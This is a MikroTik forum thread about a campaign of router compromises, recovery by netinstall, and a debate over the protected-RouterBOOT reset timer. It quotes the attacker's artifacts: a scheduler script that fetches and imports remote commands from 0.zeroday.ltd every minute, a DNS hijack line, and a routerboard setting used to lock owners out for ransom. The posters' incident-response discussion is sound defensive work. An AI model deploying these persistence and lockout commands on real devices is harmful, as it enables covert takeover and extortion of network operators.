Hi all,

This past week we have been facing a lot of hacking issue on our router. The symptoms is all the same, router can still be ping, cannot be remote, L2 traffic working fine but all L3 traffic down, LCD no screen. When we try to reboot the router, it would crash the router and boot kernel failure.

These are several prevention that we have done

- Non standard port for remote router (not 8291, 21 or 22)
- /ip/service only allow certain IP to remote the router
- Firewall input packet with port scanner rule and drop the suspected IP
- Upgrade router firmware and version to the latest (6.49)

This has happen for quite a number of our router with different model (ccr1036, ccr1009, 4011, 3011, 1100, etc)

Anybody happens to have the same problem? Any other configuration we could done to prevent this?

Thank you

What makes you think this has anything to do with "hacking" ?
Some of the issues you mention is possible normal behavior with the latest "stable" ROS releases.

Only because it's not on your list:
- create a new user and delete the admin (don't use somtiing like 'noc' or other standards.
- set up a massaging for logins, so you have the chance to notice if someone is working on it who shouldn't (e.g. email for system,account)

Backups and configuration export not not mentioned (for recovery with netinstlall if something goes bad).

Are you allowing access to the router from external sites?
If so how are you doing this?
Which kind of VPN are you using for this access??

/export hide-sensitive file=anynameyouwish

Hi,
Have you tried to check in scheduler and scripts, in router, for something unusual?

What makes you think this has anything to do with "hacking" ?
Some of the issues you mention is possible normal behavior with the latest "stable" ROS releases.

Hi, We are quite sure because over 15pcs of router has the same issue, before that we are using old version 6.3xx after upgrading to 6.49 the same issue reappear

Are you allowing access to the router from external sites?
If so how are you doing this?
Which kind of VPN are you using for this access??

/export hide-sensitive file=anynameyouwish

Hi,

We have disable the access to router only from certain ip (office). If we are outside of office, we need to do L2tp before we can login to the router.

We are blocking the access using /ip/services, with non standard port and certain IP only to access the router. We have also do weekly backup to ftp

During the checking from one of our router backup, we found this script

/script
add dont-require-permissions=no name=fetch owner=god policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source="/\
tool fetch url=http://0.zeroday.ltd/command.scr; :delay 10; /import file-n\
ame=command.scr; :delay 30; /file remove command.scr"

/scheduler
add interval=1m name=fetch1m on-event=fetch policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
start-date=oct/22/2021 start-time=17:05:35

We have tried to download this file "command.scr", when we run it's only html file.

Any other suggestion guys?

Now THAT is indeed something completely different and looks not good. (as you guessed, that script should not be there...)
This URL-fetches indeed some ROS-CLI/script code and therefore can be configured/provisioned with whatever needs to be exploited/attacked or something at a certain time.

I think the only safe way is to NETINSTALL these devices again.
After that, prepare all the config and only connect to "Internet" when you checked that all usernames/passwords/services are hardened.
Probably this was hacked long time ago with some ROS-versions that has serious issues.

Perhaps the danger is also coming from "inside" you network ?

It does look like someone has had (still has ?) access to your device.

What I would do:
- Block all external access to that device (pull the WAN cable out, sorry for that but it's needed)
- remove that script and schedule
- review any other script/auto-setting/whatever still available in Files
- review your logs for admin and VPN access
- change password of admin user (better: make new user with admin rights and REMOVE default admin user)
- change L2TP credentials
- review your firewall (enable logging for all possible open ports until you identify the open door)
Obviously someone is able to get in one way or the other so investigate those logs and firewall settings carefully.

Connect WAN again and regularly investigate logs for admin/VPN access. You could use a script to have them mailed to you periodically.
See what happens.

If all fails - emergency situation:
factory reset that router and start again.
Do NOT import any settings/scripts from the old environment without having seen every single line.

Others will surely chime in with alternative (better) suggestions.
EDIT: someone just did.

Your router was hacked before it was upgraded, due to bug in Winbox on older version.

There are only one good solution:
Netinstall
Do NOT restore config
Export old config and add manually only what is needed.

Your router was hacked before it was upgraded, due to bug in Winbox on older version.

I agree. The "zeroday.ltd" bit looks suspiciously like this post, which points to this 3-year-old CVE. OP may be part of the Mēris resurgence.

Remove all devices from internet,
Export the config, so you can remember the NEEDED settings but dont copy blindly,
As stated netinstall and do not copy old config to new firmware.
Do not use any of same passwords and change port number for winbox or ssh for example.

Ensure all connected PCs etc are fully scanned with antivirus/malware etc......

Hi,

We have removed the hacked device, replace with new one, we added new settings remove all mactelnet mac winboz capabilities. But after a day or so, its being hacked again. Really confused and frustated with whats going on.

All the hacked router, they have set random reset timer, so it's very hard to be reset. After much patient, we managed to reset 40% of the router, but the rest is still on going. After each reset, we would netinstall the router and it feels like a brand new.

But after we put it to production, it would get hack as well like the new router.

All ppp secrets, scripts, scheduler, all of the admin (with full and write authorities) computer has been scanned with anti virus, all checked and no problem. We have also change default username with strange name and hard password

We are considering is this an exploit bug in mikrotik or a hole in linux OS that runs mikrotik?

Any idea guys?

Yes, stop using infected routers.
You need to install fresh netinstall latest firmware.
Use different passwords etc.......
CHANGE ALL YOUR VPN settings, everything should be different from before.
Assume all passwords and secrets of all settings are known.


The only way you are being hacked is if you are not following basic security instructions.
The exploit is your own stupidity as an admin./........... also for not keeping routers up to date ................

A bit harsh but it does boil down to this, yes.

<removed part, anav already said the same>

Adding an analogy, maybe it will become more clear:

Water is pouring from the tap, sink is spilling over.
What do you do first ?
Clean up the spilled water or close the tap ?

Right now it looks like you're only cleaning... you'll keep doing that until you close the tap.

Adding an analogy, maybe it will become more clear:

Water is pouring from the tap, sink is spilling over.
What do you do first ?
Clean up the spilled water or close the tap ?

Right now it looks like you're only cleaning... you'll keep doing that until you close the tap.

A much kinder way of saying that, thanks Holeven, but not even close to satisfying

I know.
Still learning that part too

I know.
Still learning that part too

Well, anybody that calls themselves an admin is allowed to make mistakes but when
they repeat the same mistakes after being given information on how to avoid it............................ blunt is less refined but more appropriate.

Ok, but he writes :

All the hacked router, they have set random reset timer, so it's very hard to be reset. After much patient, we managed to reset 40% of the router, but the rest is still on going. After each reset, we would netinstall the router and it feels like a brand new.

So IF he effectively net-installed an infected one, deploy 6.47/6.48/6.49 on it, create strong usernames/password and lockdown services and it STILL gets infected ?!

Very strange story and probably we are not getting the full context here...

Hi all,

We agree that this caused by our stupidity, but all the things thats said on this thread has been done. We will rechecked everything again to make sure nothing is skipped.

On the event of netinstall, yes we immediately install with the newest version. And we dont import the config to router, what we did is copy and paste each line of config that we checked and see fit. Nothing sneaky get paste to the config.

Jvanhambelgium, yes we have netinstall change new random username/password on the newly installed router.

One thing that we do today is closed down our radius server, it's linux server and we use it for AAA for login. The username/password on each router is only for emergency backup.

The reason why we havent done that at first, is we have checked all the log and scan the radius server as well, nothing is weird and its sitting in private IP.

Anyone has this experience?

So IF he effectively net-installed an infected one, deploy 6.47/6.48/6.49 on it, create strong usernames/password and lockdown services and it STILL gets infected ?!

Very strange story and probably we are not getting the full context here...

This can only mean (I think) one way or the other the malicious code is already inside AND is somehow being used to re-infect those routers.

Don't trust a thing. Not even your backups !
Download ALL packages needed for reinstall new, if possible do so from a device not on your network. Do not reuse anything which comes from an internal source.
Do not have these newly installed routers make management connection to internal resources (only traffic, obviously).
If possible, allow (temporarily) only MAC management access to such router using one of the eth ports. Not via VPN, not via other LAN sources.
If you say you already handled a couple of routers and they get re-infected, start over with a couple and put very close monitoring on those devices to see when and how it happens again.

A freshly installed router with proper firewall and proper admin access can normally not be hacked.
There has to be a Trojan Horse hiding...

There are information about windows malware, that knows how to connect to MT router with default password and make a configuration changes to add it to botnet.

So admin: no password to local network are not safe anymore.

Im not sure if same malware are comparing credentials to database of credentials that were aquired with winbox vulnerability last year, but if any hacked router has your username and password on it, i wouldn't use it on any router ever again.

It would be also interesting to see exports from what you call a good/clean config vs one that is hacked.

There are information about windows malware, that knows how to connect to MT router with default password and make a configuration changes to add it to botnet.

So admin: no password to local network are not safe anymore.

Well this has to be changed by MikroTik anyway, as it will be forbidden to sell devices in the EU from 2024 in the state as it is now (standard default password).
Other manufacturers are already selling devices with default password printed on a sticker, not derived from MAC address or serial number.
Some recent "pre-configured" MikroTik devices have this as well, but the password is lost on a factory reset. So that still has to be improved.

There are information about windows malware, that knows how to connect to MT router with default password and make a configuration changes to add it to botnet.

So admin: no password to local network are not safe anymore.

Well this has to be changed by MikroTik anyway, as it will be forbidden to sell devices in the EU from 2024 in the state as it is now (standard default password).
Other manufacturers are already selling devices with default password printed on a sticker, not derived from MAC address or serial number.
Some recent "pre-configured" MikroTik devices have this as well, but the password is lost on a factory reset. So that still has to be improved.

Last time I checked Latvia is part of the EU so they should be more then aware.
And otherwise there is still an import possible through some UK-channels (since they decided to leave EU )

Problem with such regulations (as usual) is they can not be enforced retro-actively.
What is sold and in the field, does not have to be retrofit.

But I fully agree it is anyhow a good measure to put in place as of ... yesterday.

PS there are some others also having some work on their plate in that respect. I'm looking at Netgear, HP, Dell, ... just to name a few I encountered the past months.

There is a difference between a homeowner being protected by such password rules.........
and a trained admin who should know how to configure a router securely. The EU rules are for the untrained masses.

On PC run live linux or install linux, netinstall there. No backups, fresh passwords. Do netinstall whit out internet connected to linux mashine and dont connect router to network, monitor for 24h. It is not possible to get reinfected after netinstall from the same device, or you have found a new, very aggressive rootkit, that lives somewhere in router that netinstall is not wiping.

command.scr

I downloaded it and opened it and that's it.

/ip dns static add address=2.56.213.19 name=download.simplemining.net ttl="7d 00:00:00"

That is only part of the hack for sure. There must be more hiding in your router. It may not be visible from the commandline.

HI All,

Finally we managed to keep the hacker out. As you all said, they have already got our username/pass and port to access the router. We had to disable our radius server for login and change different port for login, with new user/pass.

It turns out this is a ransom hack, they leave a note in neighbour and we tried to contact them. After paying the ransom, we managed to get back the control of the router.

There's a config that they put to prevent us from resetting the router and do netinstall.

/system routerboard settings
set baud-rate=2400 boot-device=nand-only protected-routerboot=enabled \
reformat-hold-button=3m37s reformat-hold-button-max=3m47s silent-boot=yes

The time that they set is very random, and it's very hard to guess, sometimes even after the whole day, no router is being resetted yet.

My question :
1. Why is this feature is introduce? It makes our life harder to reset a router. Is it possible there's someone want to hack our router physically by resetting it onsite? I think the probability is very low, physical router without configuration is useless.
2. Is there a way to bypass this? maybe some backdoor way to reset and netinstall the router?
3. Even if this router is needed feature, shouldn't it have a maximum time maybe 3 mins, more than that is highly unlikely an accidental reset.

Thank you

Hmm, that is an interesting approach the hacker/ransom-guys took....
I did not even know it existed and believe with a net install + physical access to the device you can always get things fixed! NOT!

This setting clearly can cause serious havoc like you experienced....this is as good as encrypting your files....

reformat-hold-button-max (5s .. 600s; Default: 10m)

Increase the security even further by setting the max hold time, this means that you must release the reset button within a specified time interval.
If you set t he "reformat-hold-button" to 60s and "reformat-hold-button-max" to 65s,
it will mean that you must hold the button 60 to 65 seconds, not less and not more, making guesses impossible. Introduced in RouterBOOT 3.38.3

Was this ransom lower than the cost of a new router? Wasn't it easier to replace devices?

Has anyone an good idea how to avoid this kind of ransom lockout of router?

This reformat protection was introduced as a security factor and is used now to lock out the owner completely.

I think this can be avoided to enforce a manual press off the button before the protection is enfcored.

My thougths:
Working: activate protection in router. Router has to be rebooted before
making it permanent. On reboot the owner has once, press the button with the exact time set in the reformat protection.

If this not done or the time is wrong the protection is not made permanent and a warning is displayed in terminal and if possible in window where you set the reformat protection.

Edit: if the setting is not made permanent they are erased and the procedure has the be started from the beginning.

It is a pity that something like this was not implemented on introduction of it.

Note from Mikrotik Manual : RouterBOARD that has the protected RouterBOOT setting enabled will blink the LED every second, to make counting easier. The LED will turn off for one second, and turn on for the next second.

https://wiki.mikrotik.com/wiki/Manual:R ... D_settings

That so one blink every two seconds. For counting the current implementation is perfect.

Can we clarify, that a hacked router can be modified so that the normal netinstall process will not work?

The protected routerboot is only for not start the router on etherboot and steal the config / certificates / files inside.
The protected routerboot do not prevent netinstall, because after at least 600s reset pressed,
the BIOS format NAND/Flash and clean RouterBOOT settings at the end,
after that start etherboot for Netinstall.
EDIT: Please read post #51 viewtopic.php?t=179987#p890288

Obviously it is still possible to unsolder the NAND/Flash chip and read it with special hardware as if it were a USB driver.

Trolling again I see, @rextended. Do read the manual please.
https://wiki.mikrotik.com/wiki/Manual:R ... D_settings
Increase the security even further by setting the max hold time, this means that you must release the reset button within a specified time interval. If you set the "reformat-hold-button" to 60s and "reformat-hold-button-max" to 65s, it will mean that you must hold the button 60 to 65 seconds, not less and not more, making guesses impossible. Introduced in RouterBOOT 3.38.3

The procedure is for start etherbot / netinstall,
Is still possible clear all and use again the router (obviously losing all inside)
The protected routerboot do not prevent reset.
EDIT: Please read post #51 viewtopic.php?t=179987#p890288

Normis:

viewtopic.php?t=94303#p470958

viewtopic.php?t=94303#p475163

Oh tell us oh mighty one, how does one guess the reformat-hold-button and reformat-hold-button-max if the hacker changed the defaults, values that are needed in order to perform a reformat?
Again, from the manual, I'll repost with key words in bold.
If you set the "reformat-hold-button" to 60s and "reformat-hold-button-max" to 65s, it will mean that you must hold the button 60 to 65 seconds, not less and not more , making guesses impossible.

You do understand than you can hold more than 600s the button?

viewtopic.php?t=94303#p498657
>>> [...] But what exactly happens when someone holds reset button more then 5 minutes? [...]
Normis: [...] Just like manual explains, it will erase the NAND in a secure way, and essentially Brick the device [...]

Stop Trolling and read what the others writes. If you do not trust Normis, you do not have hope.

viewtopic.php?t=94303#p513933

This feature is not to prevent something from being stolen

Normis code

This feature is not to prevent something from being stolen. It is to protect your data.
The feature allows to block device from using network boot to access your data without password.
By using protected routerboot, a forgotten password will mean to nullify your NAND, then Netinstall.
This way, if somebody steals your device, your config and passwords are safe.

As I wrote also above (and in the docs linked), reformat-hold-button-max (5s .. 600s; Default: 10m) Introduced in RouterBOOT 3.38.3
That feature wasn't around when normis wrote that, in 2015.

And I'm also the author of this guide, wroten some time ago...
viewtopic.php?t=94303#p580430

If you use correct time, you can use netinstall with "keep old configuration" you lose only the files,
EDIT: WRONG, ALSO IF YOU KNOW THE RIGHT TIME, ALL IS LOST. This clean also the BIOS settings and all protected routerboot settings.

if you do not know the correct time, and the button is pressed over the reformat-hold-button-max (defaut 10min) the NAND is cleared
and you are able to netinstall the board again.
EDIT: Please read post #51 viewtopic.php?t=179987#p890288

Try yourself without insist too much.

I'll open a ticket that the manual is wrong, based on your findings.
LE: no need, seems that the documentation from the wiki is right.

I give you my word of honor that in this moment I am trying everything again, because you have put the doubt on me.

From post #47:
If you use correct time, you can use netinstall with "keep old configuration" you lose only the files,
WRONG, ALSO IF YOU KNOW THE RIGHT TIME, ALL IS LOST.
This clean also the BIOS settings and all protected routerboot settings.

Now I test the reset timer.

Sounds like it does need be confirmed one way or another!
Thanks for your work on this.

Tested with one RB911G-5HPnD that have RouterBOOT 6.43.7 as factory (backup), RouterBOOT 6.47.10 as current, and running RouterOS 6.47.10

CLI code

# RouterOS 6.47.10

             model: 911G-5HPnD
     firmware-type: ar9340
  factory-firmware: 6.43.7
  current-firmware: 6.47.10
  upgrade-firmware: 6.47.10

/system routerboard settings
set force-backup-booter=no protected-routerboot=enabled reformat-hold-button=20s reformat-hold-button-max=30s

The time is counted from first "blink" (all wifi leds off) = 1st second

For now is exactly this, without any doubt or objection:

if protected-routerboot=enabled and the reset is still pressed before power the device, the RB911G-5HPnD use the factory (backup) RouterBOOT 6.43.7 for booter
or
if protected-routerboot=enabled and the reset is pressed and is mantained pressed just after the power led goes on, the RB911G-5HPnD use the current RouterBOOT 6.47.10 for booter


pressed less than reformat-hold-button = boot normally like nothing is done

pressed exactly reformat-hold-button time = the NAND / Flash are formatted and the BIOS settings (not the BIOS itself) are cleaned

pressed between reformat-hold-button time and reformat-hold-button-max = the NAND / Flash are formatted and the BIOS settings (not the BIOS itself) are cleaned

pressed exactly reformat-hold-button-max time = the NAND / Flash are formatted and the BIOS settings (not the BIOS itself) are cleaned

pressed between reformat-hold-button-max and 600s = boot normally like nothing is done

pressed exactly 600s = boot normally like nothing is done

pressed for more than 600s and released = boot normally like nothing is done

pressed undefinitely and never released = do not boot, uselessly blink

Added notices:

System Reset Configuration do not clear any of the protected-routerboot settings.

Actually is impossible to set time differencies less than 10 seconds between reformat-hold-button and reformat-hold-button-max

1/2 bottle of wine later.............

I publish the other test results tomorrow (press reset and keep pressed after led on for use 6.47.10 BIOS boot code).

reformat-hold-button-max (5s .. 600s; Default: 10m)

Try to hold down a small button for 10 minutes without loosing the press (start over) or kill your finger.....

MT does software, HF (MMI) is not there strongpoint.
(MT recommends having a bucket of sand by your PC, and frequently jamming your fingers into the bucket to strengthen them for eventual push button use!!)

reformat-hold-button-max (5s .. 600s; Default: 10m)

Try to hold down a small button for 10 minutes without loosing the press (start over) or kill your finger.....

I use this

Please someone than can speak/write english help me to correct this post:

viewtopic.php?t=179987#p890288

for not be ambiguos or not understandable.

Thanks.

I'll open a ticket that the manual is wrong, based on your findings.

Dear Znevna, at this time is clear that misusing protected-routerboard brick the device, and is unrecuperable with Netinstall.

On the past, before introducing the reformat-hold-button-max, if you use the correct timing,
Netinstall can recover demaged installation without loose the configuration inside.
Now protected-routerboard can be used only for protect by software the inside configuration,
to brick definitively the device, for ransom or for misconfiguration.

It is clear that by unsoldering the NAND / Flash you can have direct access to everything without the slightest restriction.

I was clearly wrong, but the documentation is not so clear, it seems you can always recover the RouterBOARD,
and instead the programmers have done something so stupid as to prevent the recovery of the RouterBOARD, even if it is their own!!!

I'll make it easy for you.
You were wrong, and the documentation from the wiki is right.
And the posts by @normis that you linked from 2015, are like I've said, from when this feature didn't exist yet, bringing his post into this discussion was also a mistake.
Conclusion, you were trolling, again, confusing users by telling them that the documentation is wrong.
Cheers!
Oh, the feature is not stupid. If the reset button gets damaged / shorted you'd end up with a brick, this way it does no harm.
Other devices have something like this implemented too, for example some Cisco Aironet APs I have around:
From the Cisco Documentation for the 1850 Series:
To reset the AP to it’s default factory-shipped configuration, keep the mode button pressed for less than 20 seconds. The AP's configuration files are cleared.
To clear the AP’s internal storage, including all configuration files, keep the mode button pressed for more than 20 seconds, but less than 60 seconds.
If you keep the mode button pressed for more than 60 seconds, the mode button is assumed faulty and no changes are made.

It should also be clear that this "protected routerboot" has the PURPOSE of locking down the route for the person with physical access!
This feature was added to allow ISPs to give "free routers" with their subscription and prevent their clients from retrieving the config from the router, changing it, resetting it, etc.
Both for keeping their service working when the router is in the hands of people without knowledge, and also to prevent routers from being sold as "fully functional MikroTik routers" in situations where the clients have terminated their contract etc.

So "not able to reset it without harsh procedures" is part of the design!
That being said, the situation in case of hacked routers is worrysome. There should be better security on the procedure to enable routerboot.
For example on AVM routers in situations like this you can only perform such important procedures after physical confirmation on the router itself.
When you set some config like this, you would get a prompt to "briefly press the button on the router" before it is being activated.

[...] If the reset button gets damaged / shorted you'd end up with a brick, this way it does no harm.[...]

If reset button is damaged on "shorted" position, the routerboard never boot again...
Just if you unsoldering the broken "shorted" button, the routerboard start again.

But you wrote above:
pressed over 600s = boot normally like nothing is done
So?
LE: ok, so it does not boot if the button is shorted, but you can still save the device and it's configuration if you fix the button, you don't lose any data.

But you wrote above:
pressed over 600s = boot normally like nothing is done
So?

read: viewtopic.php?p=890398#p890384

I think it was clear that every time the button was released...
Added warning for never released button.
Yesterday I went home and left the button pressed all night...

Hi All,

I am sorry for bringing up this topic and creates a debate between us. Maybe it would be good if Mikrotik support team help to answer this correctly, do help clear the misunderstanding.

From my view, this kind of protection is a bit too much for device like Mikrotik. I agree if it's to protect our configuration, but to protect the device cannot be reset, it's way too much, this is not an Iphone or any other expensive device where there's high resale value. Mikrotik phylosophy is always if its broken, just throw it and buy a new one, change it.

Thank you

Well, you CAN reformat it, considering the window is minimum 10 seconds and somewhere between 5 seconds and 600 seconds, but it's a lot of values to test and a lot of time wasted.
But not "impossible".

From my view, this kind of protection is a bit too much for device like Mikrotik. I agree if it's to protect our configuration, but to protect the device cannot be reset, it's way too much

As it was explained already, Mikrotik implemented this feature on request from ISPs who hand out Mikrotik devices to clients. So these ISPs are actually after protecting their property from being stolen from them (by now ex-customers). Mikrotik is known to react to requests from resellers (and if a reseller has a large ISP for customer, their wish has some weight) but not to requests of individual users ... With any idea it is possible that it back-fires if all consequences of implementing it are not thoroughly investigated. Or perhaps MT did consider such a consequence but decided to go forward with implementation anyway.

From the Cisco Documentation for the 1850 Series:
To reset the AP to it’s default factory-shipped configuration, keep the mode button pressed for less than 20 seconds. The AP's configuration files are cleared.
To clear the AP’s internal storage, including all configuration files, keep the mode button pressed for more than 20 seconds, but less than 60 seconds.
If you keep the mode button pressed for more than 60 seconds, the mode button is assumed faulty and no changes are made.

But a big difference, these times are fixed, so can not be changed by someone.

Yes, you can't change the values, but you can disable the button while the AP is connected to a controller (from the controller), similar to how you can only change Protected Routerboot only from RouterOS.
So if your controller gets compromised, they can still lock you out of your devices.
If you didn't secure access to the management interfaces of the devices properly, bye bye hardware.
Next time don't be cheap or lazy and do it properly, not based on outdated youtube tutorials or copy/pasta from random forum posts without knowing what they do.

Okay, for the MT challenged users, like me.
What is the quick story?

It appears that a hacked router can be compromised such that the home owner can never recover the router via netinstall
TRUE/FALSE?

Since being compromised means that any admin setting prior to getting hacked to change any routerboard boot status is useless as the hacker can now change that to whatever setting is desired?
TRUE/FALSE?

If both answers are TRUE, then we may have a problem!

What is the solution?

From what I understood. Twice yes.

Houston, we have a probleem.

What is the solution?

Do not buy MikroTik products.

What is the solution?

Don't run a network if you can't secure access to your devices properly and can't afford someone to do it for you. (and no, anav, a magic blacklist doesn't help, no).
Run a flower shop or something.

Run a flower shop or something.

At work we have (amongst other things) a flower shop. I can assure that is not for nitwits either.

Bravo, and that after half a bottle Tequila...hIPsssss

What is the solution?

The Solution: Know what you are doing ! ... if you do not know then find someone who does know.
1. Many entrepreneurs [individual who creates a new business] buy MikroTik because Tik Routers are powerful and CHEAP proving lots of business opportunities.
2. Vast number of these entrepreneurs do not have the knowhow to properly secure their systems nor do they have an understanding of the hardware.
3. RouterOS is a OS shell ... a proprietary shell that exploits Linux OS .... Not for home users unless the system is configured for the home user and told unequivocally that THEY cannot make any changes. Any changes must be done by their provider.
4. Many IT hobbyist love MikroTik because Tik Routers are powerful and CHEAP ... they love the challenges the RouterOS provides and the learning experience.
5. Many IT hobbyist love to help MikroTik newbies get to the promised land.

Such responses...............
All missed the point entirely that I was getting at.

MIKROTIK has added a capability to the router to allow ISPs to modify something such that its useful for the ISPs.
This modification is admin user selectable, meaning its thus also available to hackers... IF, and only IF the router is compromised.
Hackers have figured out how to use this functionality so as to render netinstall unavailable as a remedy aka to recover from discovering the hack.
The only remedy is the trash bin and buy a new one.


Agreed:
a. setup the router properly in the first place and keep firmware up to date.
b. But why not ask MT to consider a better implementation of such functionality.
i. it is permanently disabled on all devices NOT sold to ISPs
ii. A key code is sent to ISPs that matches with their devices to enable functionality (requires two things - ISP equipment matched to a specific key function available but off)
OR
iii. Cloud access code and access only available to ISPs to enable ISP equipment with this functionality.

Unless this is a way to garner extra revenue by exposing the router to potential permanent hack as a business model and a security lesson??
a. hopefully the buyer/admin learns their security lesson
b. raises profit for MT

damn... this is exactly the reason why it is so stupid idea trying to force manufacturers to create backdoors by goverments.. whatever seems like a good idea/intention first, is always abused.

This is a really bad function, i hope those crying ISPs will regret that after getting $2000 CCRs remotely sw bricked like this from a fired employee..

Hack recovery with ROS prior to this "function":
- netinstall, set, secure & harden

Hack recovery with ROS including this "function":
- buy all new hardware or pay ransom (or spend a day with every device guessing the time :d )

Yeah, all devices should be secured, can't agree more on this.. but this still doesn't seem right. What will happen, when some real dangerous exploitable ROS bug for well-secured routers will finally be found? Will Mikrotik pay for all the bricked and un-resetable CCRs in datacenters instead of just issuing a patch?

damn... this is exactly the reason why it is so stupid idea trying to force manufacturers to create backdoors by goverments.. whatever seems like a good idea/intention first, is always abused.

This is a really bad function, i hope those crying ISPs will regret that after getting $2000 CCRs remotely sw bricked like this from a fired employee..

Hack recovery with ROS prior to this "function":
- netinstall, set, secure & harden

Hack recovery with ROS including this "function":
- buy all new hardware or pay ransom (or spend a day with every device guessing the time :d )

Yeah, all devices should be secured, can't agree more on this.. but this still doesn't seem right. What will happen, when some real dangerous exploitable ROS bug for well-secured routers will finally be found? Will Mikrotik pay for all the bricked and un-resetable CCRs in datacenters instead of just issuing a patch?

so damn true xt22, i couldn't agree more, not to mention the downtime and time needed to fulfil the new unit through corporate fulfilment process.

Instead we could just simple reset, do netinstall, load configuration and be done with it.

While I do agree it is very troublesome how such a router can be locked, let's not forget the root cause.

Unauthorized admin access into your network.
Nothing Mikrotik can do about that.

Already found the source for that backdoor ?
Or it might sooner or later happen again !

Don't blame MikroTik for your own (or the network administrators) negligence.
The only devices that don't have features like this are supermarket routers. Any "enterprise" / bussiness grade decent device has security features in order to protect it from beeing reset/log into it, even when someone gains physical access to it. Like I've mentioned those Cisco APs earlier, HP has "Front panel security" you can look it up if needed. Other vendors have other names for this.
Like @holvoetn wrote above, you still don't know how you were compromised, you had no internal check, no logs, no nothing, and after your "corporate fulfilment process" is done your new shiny router might have the same fate.

I am a bit irrated by the statement don't blame Mikrotik. Mikrotik had vulnerabilities built in, unintentional, and they only way of those not being used, is not using Mikrotik.

That is way building backdoors in, is an invite on time to be hacked/held hostage. So don't do that ever.

When introduced security measurements are used to lock yourself out then that really bitter. This time the blackmailers where smarter than us and Mikrotik combined. Darn...

Those vulnerabilities were fixed, and if you had properly secured access to management interfaces you woldn't even care about those vulnerabilities, right? right.
You can run the most vulnerable, ancient, RouterOS there is, and even keep it online and functional, if you secure access to it properly, right? right.

The huge numbers of evil Mikrotik routers do attacks, every day and those groups even got names.

A chain is as strong as the weakest link and in the past there where many weak links and those are still a pest to us, now and in the far future.

+ 1

in next v6 and v7 versions, protected bootloader function will have to be confirmed with press of a button. Nobody who has your password will be able to set it, if he has no physical access to the device.

Thanks Normis - great motivation to get people to upgrade!

tnx for including this @normis !

in next v6 and v7 versions, protected bootloader function will have to be confirmed with press of a button. Nobody who has your password will be able to set it, if he has no physical access to the device.

+1 Like the common sense solution, simpler than my key code or cloud code suggestion.

Don't blame MikroTik for your own (or the network administrators) negligence.
The only devices that don't have features like this are supermarket routers. Any "enterprise" / bussiness grade decent device has security features in order to protect it from beeing reset/log into it, even when someone gains physical access to it. Like I've mentioned those Cisco APs earlier, HP has "Front panel security" you can look it up if needed. Other vendors have other names for this.
Like @holvoetn wrote above, you still don't know how you were compromised, you had no internal check, no logs, no nothing, and after your "corporate fulfilment process" is done your new shiny router might have the same fate.

this in not true - I don't know about Cisco, but at least for HP Procurve/Arubas, you can either disable factory-reset, or password-recovery in the Front panel security - not both, one option excludes the other. There is obvious intention from HP not letting users with bricked devices, so if you disable factory-reset, you can still use recover-password and gain OTP from HP support. So with HP, you don't have to pay the ransom or scrap the hardware, thats what people are complaining about.

HP states this clearly, Mikrotik doesn't, so I doubt there is an option to unbrick Mikrotik hw through their support, I wonder if someone from Mikrotik can confirm this - or confirm my mistake at best, @humanbot did you contact Mikrotik support in this manner?

And I see many people mixing here just some kind of password reset (with gaining access to the device, filesystem, config..) and full wipe & factory reset - those are two very different things.


// edit - I have read avan's post posted while I was writing this, and Normis's post I have missed - great news, thanks. This confirms what we wrote, that this is a problem

in next v6 and v7 versions, protected bootloader function will have to be confirmed with press of a button. Nobody who has your password will be able to set it, if he has no physical access to the device.

Too much rapid this response , probably MikroTik staff know thousand of ransom cases that cause this decision???

Please also consider:
For be enabled, button must be pressed, for be disabled, NOT.


From viewtopic.php?p=890674#p890288

pressed undefinitely and never released = do not boot, uselessly blink

@Znevna

From the Cisco Documentation for the 1850 Series:
If you keep the mode button pressed for more than 60 seconds, the mode button is assumed faulty and no changes are made.

And also please consider to add this:
button pressed over "reformat-hold-button-max" is considerered broken button, and the device boot normally like nothing is pressed

in next v6 and v7 versions, protected bootloader function will have to be confirmed with press of a button. Nobody who has your password will be able to set it, if he has no physical access to the device.

Scenario:
Bob reads about this, Bob updates his unsecured router, Bob sets protected routerboot thinking at it as a security measure, confirms it with the press of the button.
Pedro gets in Bobs unsecured router easily, sees the protected bootloader set, changes the reformat-hold-button and reformat-hold-button-max, Pedro asks for money.
Bob knows that he set protected routerboot and thinks that he can reformat anyway.
But, oh wait, he can't, because he doesn't know the format window anymore.
Bob still ends up with a brick.
Is my scenario right? Or those values can't be changed from RouterOS once Protected Routerboot has been set?

Scenario:
Bob reads about this, Bob updates his unsecured router, Bob sets protected routerboot thinking at it as a security measure, confirms it with the press of the button.
Pedro gets in Bobs unsecured router easily, sees the protected bootloader set, changes the reformat-hold-button and reformat-hold-button-max, Pedro asks for money.
Bob knows that he set protected routerboot and thinks that he can reformat anyway.
But, oh wait, he can't, because he doesn't know the format window anymore.
Bob still ends up with a brick.
Is my scenario right? Or those values can't be changed from RouterOS once Protected Routerboot has been set?

I would hope any changes to this menu would require a button press.

That's the most logical implementation...
Everytime change timing must require button press, everytime enable this feature require button press.
But must be always possible to read on plaintext and export / backup the time set.

If someone have routerboard access, selecting "system reset" must clean all without press any button,
also disable protected-routerboard and defaulting all values, like now.

No, you need physical acces and access to RouterOS to succesfully change that setting in the future versions of RouterOS.

In short, one shot, to set timing and confirm. No confirmation, all protection is blanked and can be set again. On a successfull press button RouterOS should only know that the protection is active and so enforced by Router-boot.

Current behavior in hAP ac2, v7.1rc6, seems the button press is already required. After > 60s without pressing a button:
Setting it again:
After confirmation:
And:
= Pedro wins.

The ransom is still possible, must be confirmed also the timing change...


@Znevna,
please you can test if system-reset is used,
protected-routerboard settings are lost?
Thanks.

in next v6 and v7 versions, protected bootloader function will have to be confirmed with press of a button. Nobody who has your password will be able to set it, if he has no physical access to the device.

I want to suggest a extra setting how to enforce. Two possibilities, defined on activation:

- allow reuse: a known time documented by Mikrotik to reset the whole router to it's factory settings (maintaining the licence for RouterOS)
- locked down: only the owner, knowing the timing can reuse the router.

The second one is the current implementation and it makes the router unusable, in case of theft.

A press button will be required on actvation and it looks logical to me to also enforce a press button on deactivation of the protection or setting a different timing.

Edit: do only show the set/max time from Router when being set. On change the new set/max time is shown till a (un)successfull set/reboot.

For deactivation when you do /system reset-configuration must be not needed,
but also if you use a user on a Router with full control, is useless press a button to disable protected-routerboard.

For my opinion must be pressd the button only:
for set protected-routerboard enabled,
for change any timing on protected-routerboard (when is enabled).

/system/reset-configuration does not alter routerboard settings, that includes protected routerboot.
The only thing that changes it is doing a format in the format window set, from the example above keeping it pressed for ~40s after power on.
